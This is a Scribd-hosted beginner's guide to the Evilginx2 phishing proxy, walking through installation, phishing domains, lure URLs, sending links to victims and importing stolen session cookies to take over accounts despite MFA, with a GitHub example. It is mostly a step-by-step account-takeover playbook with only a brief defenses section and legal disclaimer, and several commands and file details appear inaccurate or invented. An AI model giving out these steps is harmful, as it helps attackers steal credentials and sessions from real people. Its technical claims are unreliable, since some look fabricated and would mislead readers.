Scribd
Upload
54 views4 pages

Evilginx2 Basics Complete Beginners Guide PHASE NETWORK

Uploaded by

phaseoffsec
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
54 views4 pages

Evilginx2 Basics Complete Beginners Guide PHASE NETWORK

Uploaded by

phaseoffsec
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

Evilginx2 Basics – Complete Beginner’s Guide

## 1. What Is Evilginx2?

Evilginx2 is a man-in-the-middle (MITM) phishing framework that proxies genuine


site traffic through a server you control. Unlike traditional phishing, it doesn’t
just steal credentials; it captures session cookies and tokens, enabling the
attacker to log in as the user—even if MFA is enabled.

---

## 2. Key Concepts & Architecture

1. **Proxy Engine**

* Intercepts all HTTP(S) traffic between the victim and a target service.
* Injects JavaScript hooks to capture tokens, cookies, and form data.
2. **Phishing Domain (“Lures”)**

* You register custom domains (e.g. `login-phish.com`) and point them to your
Evilginx2 server.
3. **Configuration “Phishlets”**

* YAML-based modules defining how to proxy each target service (e.g. Google,
Facebook).
* Specify hostnames, paths to rewrite, JS callbacks for token capture, and
session endpoints.
4. **Session Management**

* Once tokens are captured, Evilginx2 packages them as a “session” you can later
import into your browser to assume the victim’s identity.

---

## 3. Prerequisites

* **Linux server** with a public IP (e.g. a VPS).


* **Domain name(s)** you control (one per targeted service ideally).
* **Docker** (optional) or Go toolchain if building from source.
* **Let’s Encrypt** client (certbot) for TLS certificates.

---

## 4. Installation

You have two main options:

### A. Precompiled Binary

1. Download latest release from GitHub:

```bash
wget
https://github.com/kgretzky/evilginx2/releases/download/v2.x.x/evilginx_linux_amd64
chmod +x evilginx_linux_amd64
mv evilginx_linux_amd64 /usr/local/bin/evilginx2
```
2. Install certbot:
```bash
sudo apt update && sudo apt install certbot
```

### B. Build from Source

1. Install Go (≥1.16).
2. Clone & build:

```bash
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo cp bin/evilginx2 /usr/local/bin/
```

---

## 5. Initial Configuration

1. **DNS**

* Create an A record pointing your phishing domain (e.g. `accounts.phish.com`)


to your server’s IP.
2. **Start Evilginx2**

```bash
sudo evilginx2
```
3. **Generate TLS Certificates** (in the Evilginx2 console):

```
> config domain phish.com
> config certbot phish.com
> phishlets enable google # example for Google
> lures create google
```

---

## 6. Managing Phishlets

* **List available:** `phishlets`


* **Enable a phishlet:**

```
> phishlets enable github
> phishlets set github domain gh-phish.com
> phishlets update github
```
* **Disable:** `phishlets disable github`

Each phishlet folder (under `~/.evilginx2/phishlets/`) includes:

* `config.yml` — hostname mappings & routes


* `phish.js` — JavaScript hooks to extract tokens & cookies
* `capture.js` — post-login hook to save session data
---

## 7. Capturing Sessions

1. **Generate a “lure” URL:**

```
> lures create google
Lure URL: https://accounts.google.phish.com
```
2. **Send to victim.**
3. **Check sessions:**

```
> sessions
[0] [email protected] – Active
```
4. **Import session into your browser:**

```bash
sessions import 0
```

This will print a browser-bookmarklet or `curl` command that sets the exact
cookies in your browser.

---

## 8. Practical Example: Phishing GitHub

```bash
# In Evilginx2 console
> config domain gh-phish.com
> config certbot gh-phish.com
> phishlets enable github
> phishlets set github domain gh-phish.com
> phishlets update github
> lures create github
Lure URL → https://github.com.gh-phish.com/login
```

Send that login link; when the victim logs in, you’ll capture their OAuth tokens
and session cookies—then simply `sessions list` and `sessions import <ID>` to take
over.

---

## 9. Limitations & Defenses

* **Limitations**

* Only works against web-based flows, not native apps.


* Modern anti-phishing protections (browser flags, always-HTTPS policies) may
block unknown domains.
* **Defenses**

* Enforce strict “Expect-CT” and HTTP Public Key Pinning (HPKP).


* Use FIDO-based phishing-resistant MFA (e.g. security keys).
* Employee/user training to spot URL anomalies.
---

## 10. Ethical & Legal Considerations

Evilginx2 is a powerful red-teaming tool—but using it without explicit


authorization is illegal. Always obtain written consent before simulating phishing
or issuing “lures” against any domain you do not own.

You might also like